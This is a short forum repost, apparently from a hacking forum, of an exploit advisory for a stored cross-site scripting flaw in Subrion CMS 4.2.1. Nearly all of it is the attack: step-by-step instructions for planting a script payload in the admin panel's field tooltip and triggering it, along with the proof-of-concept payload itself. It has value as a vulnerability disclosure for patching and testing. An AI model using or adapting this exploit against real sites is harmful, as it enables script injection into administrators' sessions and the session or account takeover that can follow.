Hoşgeldin Misafir

Subrion CMS 4.2.1 - Stored Cross-Site Scripting Vulnerability

greenbone

4 Eyl 2022
2,020 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://intelliants.com/
# Version: 4.2.1
# Tested on: Windows & XAMPP
 
==> Tutorial <==
 
1- Go to the following url. => http://(HOST)/panel/fields/add
2- Write XSS Payload into the tooltip value of the field add page.
3- Press "Save" button.
4- Go to the following url. => http://(HOST)/panel/members/add
 
XSS Payload ==> "<script>alert("field_tooltip_XSS")</script>
 
Reference: ://github.com/intelliants/subrion/issues/895
 
#  0day.today [2023-04-16]  #